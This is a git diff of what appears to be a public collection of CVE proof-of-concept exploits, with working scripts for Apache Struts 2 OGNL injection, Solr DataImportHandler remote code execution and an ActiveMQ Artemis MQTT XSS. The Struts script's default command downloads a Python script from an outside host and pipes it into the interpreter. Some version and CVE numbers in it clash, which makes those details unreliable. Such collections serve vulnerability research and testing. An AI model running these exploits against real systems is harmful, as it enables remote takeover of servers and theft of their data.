+\ + +"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +\ + "(#ros.flush())}" + + self.payload = "--%s\r\nContent-Disposition: form-data; +name=\"foo\"; " \ + "filename=\"%s\0b\"\r\nContent-Type: +text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( + boundary, payload, boundary + ) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def send_payload(self, command='curl --insecure -sv +https://10.10.10.10/shell.py|python -'): + url = self.target + stdout.write('sending payload to %s payload %s' % (url, command)) + resp = self.do_post(url=url, params=self.query_params, +data=self.payload.replace('{COMMAND}', command)) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, + description='CVE-2020-0230 Struts +2 exploit') + try: + parser.add_argument('-target', action='store', help='Target +address: http(s)://target.com/index.action') + parser.add_argument('-command', action='store', + help='Command to execute: touch /tmp/pwn') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', 
+help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s debug %s proxy %s\n' % ( + options.target, options.debug, options.proxy + )) + + result = exp.send_payload(command=options.command) + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + stderr.write('error in main %s' % str(error)) \ No newline at end of file diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md index b9a4f94c10b77c0c5162b3b51f0501e42824b08f..94d8caa358110a446ee55ab5edd18c33a0677b76 100644 --- a/cve/apache-Struts/2019/CVE-2019-0230/README.md +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md 
@@ -1,21 +1,21 @@ -# Apache Struts 2.5.20 - Double OGNL evaluation -Exploit Author: Lucas Souza https://lsass.io -Vendor Homepage: https://apache.org/ -Version: 2.4.49 -Tested on: 2.4.49 -CVE : CVE-2019-0230 -Credits: Ash Daulton and the cPanel Security Team -# Usage -``` -python CVE-2019-0230.py + --target : Target address --command : Command to execute --debug : Enable debugging --proxy : Enable proxy -``` -# reference -http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html -http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html -https://cwiki.apache.org/confluence/display/ww/s2-059 -https://launchpad.support.sap.com/#/notes/2982840 +# Apache Struts 2.5.20 - Double OGNL evaluation +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2019-0230 +Credits: Ash Daulton and the cPanel Security Team +# Usage +``` +python CVE-2019-0230.py + +-target : Target address +-command : Command to execute +-debug : Enable debugging +-proxy : Enable proxy +``` +# reference +http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html +http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html +https://cwiki.apache.org/confluence/display/ww/s2-059 +https://launchpad.support.sap.com/#/notes/2982840 https://www.oracle.com/security-alerts/cpujan2021.html \ No newline at end of file diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml index e1e4a6e846ed2f110965d3d2507c6fad252e1246..819ec7b5063518722639574bf5a4687742af7370 100644 --- a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml 
@@ -1,24 +1,24 @@ -id: CVE-2019-0230 -source: https://www.exploit-db.com/exploits/49068 -info: - name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 - severity: critical - description: - Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 - scope-of-influence: - Struts 2.0.0 - Struts 2.5.20 - reference: - - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html - - https://cwiki.apache.org/confluence/display/ww/s2-059 - - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html - - https://launchpad.support.sap.com/#/notes/2982840 - - https://www.oracle.com/security-alerts/cpuApr2021.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-0230 - cwe-id: CWE-1321 - cnvd-id: None - kve-id: None - tags: - - 远程命令执行 +id: CVE-2019-0230 +source: https://www.exploit-db.com/exploits/49068 +info: + name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 + severity: critical + description: + Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 + scope-of-influence: + Struts 2.0.0 - Struts 2.5.20 + reference: + - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html + - https://cwiki.apache.org/confluence/display/ww/s2-059 + - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html + - https://launchpad.support.sap.com/#/notes/2982840 + - https://www.oracle.com/security-alerts/cpuApr2021.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0230 + cwe-id: CWE-1321 + cnvd-id: None + kve-id: None + tags: + - 远程命令执行 
diff --git a/cve/apache-activemq/2020/CVE-2020-13932/poc.py b/cve/apache-activemq/2020/CVE-2020-13932/poc.py index d85d0d517cc1c81cff7b6232220daf4b64373f6c..62973a9b5b99d1a99f3d26773183d2953522f2f5 100644 --- a/cve/apache-activemq/2020/CVE-2020-13932/poc.py +++ b/cve/apache-activemq/2020/CVE-2020-13932/poc.py @@ -1,22 +1,22 @@ -import time -import socket -from scapy.contrib.mqtt import * -from scapy.compat import raw - -brokerIP = "" # input the server IP here -brokerPort = 1883 # The default listen port of MQTT is 1883 -clientid = "" #Malformed Clientid -malformedTopic = "" # Malformed Topic - -if __name__ == '__main__': - connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid) - # Malformed Connect Message - subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1) - # Malformed Subscribe Message - conn = socket.socket() - conn.connect((brokerIP, brokerPort)) - conn.send(raw(connMessage)) - time.sleep(1) - conn.send(raw(subMessage)) - input() # Keep the MQTT Connection - conn.close() +import time +import socket +from scapy.contrib.mqtt import * +from scapy.compat import raw + +brokerIP = "" # input the server IP here +brokerPort = 1883 # The default listen port of MQTT is 1883 +clientid = "" #Malformed Clientid +malformedTopic = "" # Malformed Topic + +if __name__ == '__main__': + connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid) + # Malformed Connect Message + subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1) + # Malformed Subscribe Message + conn = socket.socket() + conn.connect((brokerIP, brokerPort)) + conn.send(raw(connMessage)) + time.sleep(1) + conn.send(raw(subMessage)) + input() # Keep the MQTT Connection + conn.close() 
diff --git a/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml index 1fa394da1d749c426810537db355ad59ff282b79..07b1b49671080e2684f48e1eb11d0cc262e59322 100644 --- a/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml +++ b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml 
@@ -1,21 +1,21 @@ -id: CVE-2020-13932 -source: Original -info: - name: Apache ActiveMQ Artemis Clientid XSS - severity: Medium - description: | - In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section. - scope-of-influence: - Apache ActiveMQ Artemis 2.5.0 to 2.13.0 - reference: - https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt - https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt - https://lists.apache.org/thread.html/r7fcedcc89e5f296b174d6b8c1438c607c30d809c04292e5732d6e4eb@%3Cusers.activemq.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-13932 - cwe-id: CWE-79 - cnvd-id: None - kve-id: None +id: CVE-2020-13932 +source: Original +info: + name: Apache ActiveMQ Artemis Clientid XSS + severity: Medium + description: | + In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section. 
+ scope-of-influence: + Apache ActiveMQ Artemis 2.5.0 to 2.13.0 + reference: + https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt + https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt + https://lists.apache.org/thread.html/r7fcedcc89e5f296b174d6b8c1438c607c30d809c04292e5732d6e4eb@%3Cusers.activemq.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-13932 + cwe-id: CWE-79 + cnvd-id: None + kve-id: None tags: XSS \ No newline at end of file diff --git a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml index 991427c4e1db623fab13bf03fd2c1b384bd8296b..6d7583ba1237c6c483b5231c5554468c90a5d11a 100644 --- a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml +++ b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml 
@@ -1,20 +1,20 @@ -id: CVE-2022-42889 -source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC -info: - name: Apache Commons Text项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。 - severity: CRITICAL - description: - Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5~1.9中,攻击者可构造恶意文本,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。 - scope-of-influence: - 1.5 <= Apache Commons Text <= 1.9 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 - - https://zhuanlan.zhihu.com/p/575580463 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-42889 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None +id: CVE-2022-42889 +source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC +info: + name: Apache Commons Text项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。 + severity: CRITICAL + description: + Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5~1.9中,攻击者可构造恶意文本,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。 + scope-of-influence: + 1.5 <= Apache Commons Text <= 1.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 + - https://zhuanlan.zhihu.com/p/575580463 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-42889 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None tags: CVE-2022, Apache Commons Text \ No newline at end of file diff --git a/cve/apache-log4j/2021/CVE-2021-44228/poc.py b/cve/apache-log4j/2021/CVE-2021-44228/poc.py old mode 100755 new mode 100644 diff --git a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py index bf16b9feb546fd306ad22dfe6a47d7bfee252920..58a5b4544d415b89ee21a19036112b312bd6296a 100644 --- a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py +++ b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py 
@@ -1,91 +1,91 @@ -import requests -import json -import sys - - -banner = ''' - _______ ________ ___ ___ __ ___ ___ __ ___ ____ - / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \/_ |/ _ \___ \ - | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) | - | | \ \/ / | __|______/ /| | | || |\__, |______| | | || |\__, |__ < - | |____ \ / | |____ / /_| |_| || | / / | |_| || | / /___) | - \_____| \/ |______| |____|\___/ |_| /_/ \___/ |_| /_/|____/ - - python By jas502n -''' -print banner - -def admin_cores(url, cmd): - core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json' - r = requests.get(url=core_selector_url) - json_strs = json.loads(r.text) - if r.status_code ==200 and "responseHeader" in r.text: - print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status'])) - for core_selector in json_strs['status']: - jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name'] - print '\n>>>>The Core Name = %s' % jas502n_Core_Name - show_config(url,jas502n_Core_Name) - get_config_name(url,jas502n_Core_Name) - URLDataSource_Poc(url,jas502n_Core_Name,cmd) - - else: - print "No core_selector Exit!" - - - - -def show_config(url,jas502n_Core_Name): - config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json" - r1 = requests.get(config_url) - - if r1.status_code ==200 and 'dataConfig' in r1.text: - print ">> config_url= %s"% config_url - print ">%s dataConfig Exit!" % jas502n_Core_Name - else: - print "dataConfig No Exit!" 
- - - -def get_config_name(url,jas502n_Core_Name): - get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json' - r2 = requests.get(get_config_url) - if r2.status_code ==200 and 'config' in r2.text: - print ">> get_config_url= %s" % get_config_url - r2_json = json.loads(r2.text) - r2_str = r2_json['initArgs'] - - print '>get_config_name= %s' % r2_str[1][1] - - else: - print "Core Config Name No Exit!" - - - -def URLDataSource_Poc(url,jas502n_Core_Name,cmd): - debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json' - payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd - headers = { - "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", - "Accept": "application/json, text/plain, */*", - "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", - "Accept-Encoding":"gzip, deflate", - "Content-type":"application/x-www-form-urlencoded", - "X-Requested-With":"XMLHttpRequest", - "Referer":"http://%s/solr/" % url - - } - r3 = requests.post(url = debug_model_url, data=payload,headers=headers) - print ">>>>> debug_model_url= %s" % debug_model_url - if r3.status_code ==200 and 'Requests' in r3.text: - - print "Send Poc Success!" 
- else: - print "No Send Poc Success!" - print r3.text - - - -if __name__ == '__main__': - cmd = sys.argv[2] - url = sys.argv[1] +import requests +import json +import sys + + +banner = ''' + _______ ________ ___ ___ __ ___ ___ __ ___ ____ + / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \/_ |/ _ \___ \ + | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) | + | | \ \/ / | __|______/ /| | | || |\__, |______| | | || |\__, |__ < + | |____ \ / | |____ / /_| |_| || | / / | |_| || | / /___) | + \_____| \/ |______| |____|\___/ |_| /_/ \___/ |_| /_/|____/ + + python By jas502n +''' +print banner + +def admin_cores(url, cmd): + core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json' + r = requests.get(url=core_selector_url) + json_strs = json.loads(r.text) + if r.status_code ==200 and "responseHeader" in r.text: + print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status'])) + for core_selector in json_strs['status']: + jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name'] + print '\n>>>>The Core Name = %s' % jas502n_Core_Name + show_config(url,jas502n_Core_Name) + get_config_name(url,jas502n_Core_Name) + URLDataSource_Poc(url,jas502n_Core_Name,cmd) + + else: + print "No core_selector Exit!" + + + + +def show_config(url,jas502n_Core_Name): + config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json" + r1 = requests.get(config_url) + + if r1.status_code ==200 and 'dataConfig' in r1.text: + print ">> config_url= %s"% config_url + print ">%s dataConfig Exit!" % jas502n_Core_Name + else: + print "dataConfig No Exit!" 
+ + + +def get_config_name(url,jas502n_Core_Name): + get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json' + r2 = requests.get(get_config_url) + if r2.status_code ==200 and 'config' in r2.text: + print ">> get_config_url= %s" % get_config_url + r2_json = json.loads(r2.text) + r2_str = r2_json['initArgs'] + + print '>get_config_name= %s' % r2_str[1][1] + + else: + print "Core Config Name No Exit!" + + + +def URLDataSource_Poc(url,jas502n_Core_Name,cmd): + debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json' + payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate", + "Content-type":"application/x-www-form-urlencoded", + "X-Requested-With":"XMLHttpRequest", + "Referer":"http://%s/solr/" % url + + } + r3 = requests.post(url = debug_model_url, data=payload,headers=headers) + print ">>>>> debug_model_url= %s" % debug_model_url + if r3.status_code ==200 and 'Requests' in r3.text: + + print "Send Poc Success!" 
+ else: + print "No Send Poc Success!" + print r3.text + + + +if __name__ == '__main__': + cmd = sys.argv[2] + url = sys.argv[1] admin_cores(url,cmd) \ No newline at end of file diff --git a/cve/apache-solr/2019/CVE-2019-0193/README.md b/cve/apache-solr/2019/CVE-2019-0193/README.md index a19fa0a1ac94ab8a12c5b40c2811c3dd802643ca..655c6d935225d7551778f166feb6be0008dab8a1 100644 --- a/cve/apache-solr/2019/CVE-2019-0193/README.md +++ b/cve/apache-solr/2019/CVE-2019-0193/README.md @@ -1,9 +1,9 @@ -# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12) - -## 描述 - -Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr的DataImportHandler是一个可选但常用的模块,可从数据库(通过JDBC)、RSS、Web 页面和文件中导入数据。而且这个模块的配置文件不仅可以在服务端中通过配置文件指定,也可以从用户请求的dataConfig中获取。 - -## 用法 - +# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12) + +## 描述 + +Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr的DataImportHandler是一个可选但常用的模块,可从数据库(通过JDBC)、RSS、Web 页面和文件中导入数据。而且这个模块的配置文件不仅可以在服务端中通过配置文件指定,也可以从用户请求的dataConfig中获取。 + +## 用法 + ```python CVE-2019-0193.py http://192.168.2.18:8983 "calc"``` \ No newline at end of file diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml index a3f83d640f79731f2b04147de481cd64fabc1d7f..35ac0fe48b2bc7728c5ef27c3b2719422c248f63 100644 --- a/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml +++ b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml 
@@ -1,40 +1,40 @@ -id: CVE-2019-0193 -source: https://github.com/jas502n/CVE-2019-0193 -info: - name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 - severity: high - description: - 在Apache Solr中,DataImportHandler是一个可选但常用的模块,用于从数据库和其他源中提取数据,它具有一个功能,其中整个DIH配置可以来自请求的“dataConfig”参数。 DIH管理界面的调试模式使用它来方便调试/开发DIH配置。由于DIH配置可以包含脚本,因此该参数存在安全风险。从Solr的8.2.0版开始,使用此参数需要将Java System属性“enable.dih.dataConfigParam”设置为true。 - scope-of-influence: - Apache Solr < 8.2.0 - reference: - - https://issues.apache.org/jira/browse/SOLR-13669 - - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E - - https://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc@%3Cusers.solr.apache.org%3E - - https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66@%3Cdev.lucene.apache.org%3E - - 
https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E - - https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51@%3Cdev.lucene.apache.org%3E - - https://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314@%3Cusers.solr.apache.org%3E - - https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef@%3Cusers.solr.apache.org%3E - - https://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E - - https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E - - https://lists.debian.org/debian-lts-announce/2019/10/msg00013.html - - https://lists.debian.org/debian-lts-announce/2020/08/msg00025.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2019-0193 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None - tags: 对生成代码的控制不恰当, 代码注入 +id: CVE-2019-0193 +source: https://github.com/jas502n/CVE-2019-0193 +info: + name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 + severity: high + description: + 在Apache Solr中,DataImportHandler是一个可选但常用的模块,用于从数据库和其他源中提取数据,它具有一个功能,其中整个DIH配置可以来自请求的“dataConfig”参数。 DIH管理界面的调试模式使用它来方便调试/开发DIH配置。由于DIH配置可以包含脚本,因此该参数存在安全风险。从Solr的8.2.0版开始,使用此参数需要将Java System属性“enable.dih.dataConfigParam”设置为true。 + scope-of-influence: + Apache Solr < 8.2.0 + reference: + - https://issues.apache.org/jira/browse/SOLR-13669 + - 
https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E + - https://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc@%3Cusers.solr.apache.org%3E + - https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66@%3Cdev.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E + - https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51@%3Cdev.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314@%3Cusers.solr.apache.org%3E + - 
